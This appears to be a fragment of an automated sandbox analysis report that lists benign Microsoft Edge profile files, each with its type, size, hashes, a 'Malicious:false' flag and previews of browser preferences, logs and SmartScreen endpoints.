                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379760322200595","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379760322200595","location":5,"ma
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):11755
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                      MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                      SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                      SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                      SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                      MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                      SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                      SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                      SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17316), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):17318
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.489331163855717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnJ99QTryDiuabatSuyp8BsIYyaNPOpegzkXMlNsNXphzd8J2w513o8VmbV+FpM:stnPGQSu48BsIYtJOpnizdgtebG6Qwz
                                                                                                                                                                                                                                                                                      MD5:964E5BE44AE1E9E3CA6916A8E5F0E39E
                                                                                                                                                                                                                                                                                      SHA1:D7A0BAF4BC05A33AC4D5190620888A2D14140082
                                                                                                                                                                                                                                                                                      SHA-256:9DADE4F4643B49DC979A5B6CCE1A83EFBEBE07E320A53E0BE9431A20D86EF5DA
                                                                                                                                                                                                                                                                                      SHA-512:F0B97BB4AE6539B8D8F7DE1253EAE3ABBAE1A589AEF029607C758B9B31156CF998E064222354A6AE3516C5862F0C31442F5D88B0C37DAE2A60DAD5BAE9FD8C89
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.10286360432781526
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:+rvY3rxspEjVl/PnnnnnnnnnnnvoQ/Eou:+rvY3rSoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                      MD5:CF5445FE827FD256EEA7CC3BAF2E58D0
                                                                                                                                                                                                                                                                                      SHA1:F60D8F96000DE3D7612A93DE98E2FDB0B6D6ED58
                                                                                                                                                                                                                                                                                      SHA-256:46AB81BD1D30F78BFA5257089C97A61A62AF6AF0BCA76016D94E6F97A22EF8CB
                                                                                                                                                                                                                                                                                      SHA-512:EB33E362EFE06B8F16090A216E5194F76631003CE2C530DC3210670B9E845C55FE3AE47BF3167607A953D0DFC7136C3D949950E1235B3AA44E019E9FA1A57D78
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):317272
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8898233624595906
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:LYo3K7PbUPUz8Nbg888JbqEW88mb3yjWZ8LbpOWW80bfvWy8Tb+/Wa1m8wb6v8e6:gIZrptmjghXUei2fS
                                                                                                                                                                                                                                                                                      MD5:F53F74DAF9A890C63682A1286E857141
                                                                                                                                                                                                                                                                                      SHA1:B8F3070AE40B60D6F6C5459ED407BFEC45BEF7D6
                                                                                                                                                                                                                                                                                      SHA-256:4991F726ECEAFB676B829A1296C3CAE3766E25A151D2432800B88F1664AE231D
                                                                                                                                                                                                                                                                                      SHA-512:C14C56889A8A8A9AC2E3708E480136577BCBEFF79474CAE8B3480DA9FB66C51F52FDE7288209A71397C096FD243E8392D7FD08602AA2482686C099E56BD205DE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):485
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.015073569894885
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuuvillfl/YOsedhOM:llc8BOuuuuuuuuuuuKllfRYD8h
                                                                                                                                                                                                                                                                                      MD5:657C206C35F2FEF33991AB2F23474D6A
                                                                                                                                                                                                                                                                                      SHA1:DCD8C47DDCC1988A8787159A11D13676368EEF33
                                                                                                                                                                                                                                                                                      SHA-256:6535B17331B935CA4AFBB272B34B653E00A491A04040D0F567B94807131EAC62
                                                                                                                                                                                                                                                                                      SHA-512:5C22582A0704CF66C45797E809CF94BF2903ACB44B0DE0B689C2914E66D6A494405682B40EA65B8851CBF4098197E7C1C6829AC4C5F4FC07506E8D264CDE0751
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.240012600058439
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyf4Iyq2PcNwi23oH+TcwtfrK+IFUt8Wyf6Fz1Zmw+Wyf6FlRkwOcNwi23oH+Tcq:oyvLZYeb23FUt8EFZ/+EFlR54ZYeb3J
                                                                                                                                                                                                                                                                                      MD5:0333D6ED5645720B61081630BF639C4F
                                                                                                                                                                                                                                                                                      SHA1:DD91DA46DB326B55CB66998096896CD21362BB2D
                                                                                                                                                                                                                                                                                      SHA-256:7C04C7E5FA1DDE20D186B15378725174D3E7907F6D42A5D6B8F078FEE51BC4B0
                                                                                                                                                                                                                                                                                      SHA-512:FACB39AA698A55E522ACD65D590E4A863AFC5CB59349734376D4848FC5BE8731778E6F084288B2A602C7B94426BF33581F47D95709D8FC5EA21966083104DA90
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.816 13c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-03:05:22.817 13c4 Recovering log #3.2024/12/27-03:05:22.817 13c4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):782
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                                                      MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                                                      SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                                                      SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                                                      SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):348
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.207523963123791
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyf64pyq2PcNwi23oH+TcwtfrzAdIFUt8Wyf64/1Zmw+Wyf64pRkwOcNwi23oH++:FIyvLZYeb9FUt8cI/+cIR54ZYeb2J
                                                                                                                                                                                                                                                                                      MD5:17E79D6FDED32CF50209132E08340571
                                                                                                                                                                                                                                                                                      SHA1:5C2EC57AB58C6926CE1E7A049709CA38CEFCF936
                                                                                                                                                                                                                                                                                      SHA-256:DA410AE85B27B88FD0B1FC0422EB7565FE2CBAD359C4C4A526D3F4B08BE13B2D
                                                                                                                                                                                                                                                                                      SHA-512:7574F83DD2D1455F6AD750F8F608464852A22792CFDDCCF249CF5B31FF21AD5B422B09A8D359429585276FC59FB850B93BEE1C4D9DBA61FCC74732E604D61F90
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.814 13c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-03:05:22.814 13c4 Recovering log #3.2024/12/27-03:05:22.814 13c4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):120
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                      MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                      SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                      SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                      SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                      MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                      SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                      SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                      SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):56066
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103048214506423
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynPPGWv/sxtwN7VLyMV/YoskFoz:z/0+zI7ynPv/4K9VeZoskG
                                                                                                                                                                                                                                                                                      MD5:FA0A1C7DF7FC7A605074E3D85A9FA92D
                                                                                                                                                                                                                                                                                      SHA1:687A003AACB6E16792FECBCFD6EAF3627BD2282A
                                                                                                                                                                                                                                                                                      SHA-256:6A908D7959F04E53B535AA3FEAF201952BDD83983A8DED335983FB53F91EF65E
                                                                                                                                                                                                                                                                                      SHA-512:08B1F7089DD480A3E7547AF811618B7D4F53BA04100DB4301AB16CB0DFF803F1A4C068ED23BA2BE84CDD0EE641EFB05C39DE55023DD4B70F6DB4DEA00FE390A9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                      MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                      SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                      SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                      SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):47
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                      MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                      SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                      SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                      SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):35
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                      MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                      SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                      SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                      SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                      MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                      SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                      SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                      SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):130439
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                      MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                      SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                      SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                      SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                      MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                      SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                      SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                      SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):57
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                      MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                      SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                      SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
